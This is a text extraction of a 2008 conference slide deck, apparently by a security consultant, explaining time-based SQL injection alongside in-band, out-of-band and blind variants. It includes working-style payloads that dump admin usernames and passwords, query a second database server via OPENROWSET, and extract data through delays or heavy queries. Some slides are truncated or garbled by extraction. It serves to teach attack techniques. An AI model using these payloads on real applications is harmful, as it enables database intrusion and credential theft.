time based sql injections

7/31/2019 Time Based SQL Injections

1/27

2008 Security-Assessment.com

1

Time Based SQL Injection

Presented by MuhaiminDzulfakar


2/27


2

Who am I

Muhaimin Dzulfakar

Security Consultant Security-Assessment.com

Application and network pen-tester


3/27


3

Agenda

What is time based SQL Injection

Differences between blind and time based SQL Injection

Time based injection with heavy queries

Limitation of time based SQL Injection


4/27


4

Different types of SQL Injection

In Band Injection

Out of Band Injection

Blind SQL Injection



5/27


5

In Band Injection

Results are embedded via union select

Useful when SQL error message is displayed

Fastest way to extract data

Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null,

null, null, concat(username,0x3a,admin_password), null fromadmin/*


6/27


6

In Band Injection


7/27 2008 Security-Assessment.com

7


Use a different communication channel to drill for data

Ex: Web Mail application in which data received via SMTP is

processed

Example of attack: Accessing your neighbour database server with

OOB injectionEx: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT

a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;

Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT

user, pass FROM users') AS a--



8


Web server

Database BDatabase A

OOB Injection

www.buyviagra.com

10.1.1.1



9

Blind SQL Injection

Application generates custom error message for failed response and

normal page for successful response

Comparison between true and false response

AND 1=1 -> true AND 1=2 -> false

Read data byte by byte



10

Blind SQL Injection



11

Blind SQL Injection



12


Use time delay to differentiate between true and false

True response time delay is executed

Failed response time delay is not executed

Read data byte by byte exactly the same method as blindinjection

First example by Chris Anley's paperMore advanced SQLInjection

Another example is in David Litchfield paperData Mining withSQL Injection and Inference



13

When we need Time Based SQL Injection

When the application generates default page for true or false

response When the application generates the same custom error page for

true or false response

Injection is successful but can't be seen by the attacker



14

Scenario 1 (Blind Injection attack)

$default=1

if value is not between 1-20

{

redirect user to page.php?id=$default

execute SQL statement

}

1 AND 1=1 [TRUE] -> default page displayed

1 AND 1=2 [FALSE] -> default page displayed

BLIND INJECTION FAILED!



15

Scenario 1(Time Based Blind Injection attack)

$default=1

if value is not between 1-20

{

redirect user to page.php?id=$default

execute SQL statement

}

1 AND 1=1 [TRUE] -> takes 5 seconds to response

1 AND 1=2 [FALSE] -> takes 1 second to response

TIME BASED BLIND INJECTION

WORKS!



16


TRUE = 2478msFALSE = 117ms

S t th diff t



17

Spot the different

Blind Injection (for MySql)

1 AND ASCII(substring((@@version),1,1))



18

Spot the different

Time Based Blind injection (for MySQL)

1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT@@version),1,1)),0)



19

Time Based Injection on MSSQL

Time Based Injection (MSSQL)

1 AND if not(substring((select @version),25,1) < 52)

waitfor delay '0:0:9'--

If the first character less than 4, execute waitfor delay

time delay

query

position operator char

Oth D t b



20

Other Databases

Oracle (without PL/SQL support) MS Access, DB2 do not have delay

functions

Time Based Injection is possible by using heavy queries

Chema Alonso and Jose Prada talked about this in Defcon 2008

2 types of conditions in 'where clause'

Light Condition first

Heavy Condition first

Select A from B where ConditionA and ConditionB

H diti fi t



21

Heavy condition first

100

Seconds

False-False

110

Seconds

TrueTrueTrue

110

Seconds

FalseFalseTrue

ResultHeavy & Light

Condition

Light Condition

10sec

Heavy condition

100sec

Result from Alonso research

Li ht diti fi t



22

Light condition first

10Secon

ds

False-False

110

Seconds

TrueTrueTrue

110

Seconds

FalseFalseTrue

ResultHeavy & Light

Condition

Heavy Condition

100sec

Light condition

10sec

Result from Alonso research

H i Q i


23/27


23

Heavies Queries

Oracle evaluates the conditions from left to right

MS Access evaluates the conditions from right to left

MSSQL evaluates light condition first

Table name needs to be known

Some of the well known default tables

MSSQL sysussers

MySQL information_schema.colums

Oracle - all_users

H i Q i


24/27


24

Heavies Queries

Example of time based injection using heavy queries on MSSQL

(light condition evaluates first)

1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers assys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusersas sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (selecttop 1 ASCII(substring(name,1,1)) from sysusers)

Suitable for databases that do not support time delay functions

Ex: Oracle and MS Access

heavy query

light query

Limitation


25/27


25

Limitation

Results are not efficient during the busy times

Time delay results also depend on how much data stored in thetable


26/27


27/27

27

Question ?

[email protected]

time based sql injections

Documents